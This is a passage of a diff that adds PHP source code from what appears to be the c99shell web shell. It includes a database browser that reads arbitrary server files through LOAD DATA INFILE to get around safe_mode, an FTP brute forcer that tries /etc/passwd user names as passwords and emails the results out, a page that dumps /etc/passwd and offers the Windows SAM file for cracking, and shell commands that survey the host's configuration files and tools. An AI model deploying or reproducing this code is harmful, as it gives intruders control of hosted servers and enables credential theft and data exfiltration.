+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b>
+            <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>FTP Brute Forcer: </b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>";
+ echo "</br>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
